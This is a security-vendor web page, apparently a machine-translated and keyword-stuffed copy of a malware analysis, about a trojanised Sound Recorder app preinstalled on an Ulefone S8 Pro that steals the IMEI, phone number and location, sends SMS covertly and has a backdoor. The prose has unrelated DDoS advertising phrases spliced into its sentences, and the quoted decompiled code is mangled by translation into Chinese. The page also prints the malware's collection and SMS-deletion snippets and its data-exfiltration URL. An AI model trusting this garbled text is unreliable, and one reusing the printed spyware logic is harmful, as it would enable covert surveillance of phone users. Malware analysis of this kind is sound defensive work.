DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > 高防服务器 > 正文

美国高防_ddos防御云服务_如何解决

美国高防_ddos防御云服务_如何解决

作者:陈宇如今,在购买一款新的安卓手机时,自己的服务器怎么防御CC,用户有大量的选择,几乎可以满足任何预算。但一些廉价的非品牌手机可能无法提供与知名制造商的客户所期望的相同的质量控制水平。在某些情况下,你甚至可能最终得到一部出厂的全新手机,预装了一个可能不需要的应用程序(PUA),甚至是恶意软件——这种情况被称为供应链妥协。很少有预装在手机固件中的恶意软件或可能不需要的应用程序,并直接从制造商那里发货,游戏ddos防御盾,但这并非闻所未闻,我们偶然发现一家手机制造商似乎至少在一个例子中做到了这一点,电脑管家能防御ddos吗,许多安卓手机和其他移动设备的制造商都将第三方的应用捆绑在一起。通常,这些应用程序安装在用于特权系统应用程序的两个位置之一,/system/app或/system/priv app文件夹。理论上,安装在这些位置的应用程序应该是可信的系统应用程序,例如文件管理器或用户期望的其他实用程序。实际上,应用程序制造商有时会付钱给手机制造商,让他们的应用程序出现在工厂形象中。这种商业模式并没有本质上的错误:手机制造商可以将价格保持在较低水平,应用程序开发者可以开始发展声誉和一些知名度。另一方面,并不是每个人的质量控制都能达到应有的水平,一些应用程序开发者可能会在自己的应用程序中包含一些不受欢迎的功能,要么是因为编码实践不善,要么是为了获得最大的投资回报而刻意为之。最近我们遇到了一个有趣的Android老鼠,它是以第三方应用程序的形式预装的,其中包括一个来自这些不太知名的制造商的廉价手机。恶意录音机2017年12月,一位安卓手机发烧友喜爱的留言板上的一位用户报告说,最近购买的手机上的一款应用正在引发用户手机杀毒产品的警报。这款名为"录音机"的应用程序与深圳uleFone公司生产的S8 Pro捆绑在一起。这是一款性能出众的安卓手机。为了证实这一说法,我们购买了同一型号的手机。我们还下载并检查了制造商在其技术支持页面上链接到该型号手机的出厂固件映像的内容。存储在/system/priv app文件夹中,我们发现了据称是恶意的录音机应用程序,录音机.apk. 我们相信这个版本的应用程序是一个故意安装了木马的良性系统实用程序,是通过在合法应用程序中添加一个恶意模块生成的,名为com.android.prize.这个应用程序没有奖,模块与录音无关。相反,它会收集用户的个人信息,如电话号码和地理位置,并将其发送到远程服务器;目前尚不清楚这是恶意代码的一部分,还是一个非常具有侵入性的应用分析工具。更明显的恶意是,它还被设计成能够向硬编码到应用程序中的号码列表发送短信,并通过短信接收指令,而无需用户的通知或同意,起到老鼠的作用。下图比较了左侧受感染应用程序的结构与右侧的合法应用程序的结构,后者在被感染之前。注意红色框中函数的名称。不受欢迎的行为恶意行为从一个BroadcastReceiver开始,该类等待手机启动完成时发送的引导完成广播。此机制为恶意软件提供持久性,使其能够在重新启动后生存。在BroadcastReceiver类中,应用程序启动一个名为ClickSimStateService的服务。该服务包含收集和发送大量详细的私人信息的功能,包括电话的唯一IMEI标识符、电话号码和位置,并将其发送到中央服务器。Object v5=arg15.getSystemService("phone");这是imsi=((电话管理器)v5.getSubscriberId();这个.imei= 销售人员统计(arg15);这个。手机=((电话管理器)v5.getLine1Number();this.provider提供程序= this.getProvider(这是imsi);客户端信息.networkType=((字节)ClientInfo.getAPNType(arg15)); 接下来,它使用百度定位API获取设备的位置:字符串v0=arg9.getAddrStr();如果(v0!=空){DecimalFormat v2=新的DecimalFormat("####.0000");Log.v("PrizeSalesStatis","[startsalestatisservice]----BigDecimal bd="+new BigDecimal(arg9.getLatitude()).setScale(2,4).toString());斯塔rtSalesStatisService.this.纬度= 双倍价值(v2.format(arg9.getLatitude());斯塔rtSalesStatisService.this.经度= 双倍价值(v2.format(arg9.getLongitude());然后,该模块将收集到的所有信息打包成JSON格式,HTTP将其发布到此处:hxxp://dt.szprize.cn/mbinfo.php它收集并提交给远程服务器的信息包括:设备的电话号码位置信息,包括经度、纬度和街道地址IMEI标识符和Android ID屏幕分辨率制造商、型号、品牌、操作系统版本CPU信息网络类型MAC地址RAM和ROM大小SD卡大小语言和国家移动电话服务提供商目前还不完全清楚的是,这是否只是录音机的应用分析组件,还是恶意软件向其c2服务器发送配置文件信息的一部分。更明显的恶意模块会创建另一个名为AutoSendSmsService的服务,该服务会向硬编码列表中随机选择的一个电话号码发送带有设备型号和IMEI的短消息:AutoSendSmsService.telNumber= AutoSendSmsService.telephoneNum[此.readomTelNum()];Log.v("PrizeSalesStatis","---->;设备状态=="+此.getDeviceInfo());发送短信(AutoSendSmsService.telNumber, 此.getDeviceInfo());接下来,它会监听接收到的和发送的广播。每次手机发送或接收短信时都会产生这些广播。通常情况下,手机会将消息发送到用户安装的任何短信应用程序,但恶意短信代码会截获并删除与列表中任何号码相关的信息,因此这些短信永远不会出现在手机短信应用程序中。AutoSendSmsService.this.deleteSMS(这个.val$上下文,这个.val$curStr,'content://sms/失败");AutoSendSmsService.this.deleteSMS(这个.val$上下文,这个.val$curStr,'内容://mms/drafts");AutoSendSmsService.this.deleteSMS(这个.val$上下文,这个.val$curStr,'content://短信/已发送");AutoSendSmsService.this.deleteSMS(这个.val$上下文,这个.val$curStr,'content://mms/收件箱");AutoSendSmsService.this.deleteSMS(这个.val$上下文,这个.val$curStr,'content://短信/发件箱");通过这种方式,它试图对最终用户隐藏自己的SMS功能跟踪。后门功能似乎泄露个人信息和秘密发送短信还不够糟糕,恶意录音机也有后门功能。它通过HTTP与C2服务器联系以获取指令,防火墙能防御cc攻击吗,并可以执行以下任务:下载并安装应用程序卸载应用程序执行shell命令在浏览器中打开URL(尽管这个函数在我们分析的示例中似乎是一个正在进行的工作)为了避免被安全分析员或最终用户发现,它使用各种方法来保持不可见。其中有些相当有趣。后门模块伪装成Android支持库的一部分。所有的字符串都加密了。为了确保设备由真实用户使用(与测试设备或沙盒相反),它仅在以下检查通过时才启动后门功能:它将记录在调用日志中的所有呼叫持续时间相加,并检查从命令和控制服务器接收的总时间是否超过某个值。totalcallduration=a.\u getcallduration(this.a);_logger.b("call Tms="+\u totalcallduration);v0_1=_totalcallduration,免费高速高防cdn

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos/51504.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 6941139访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X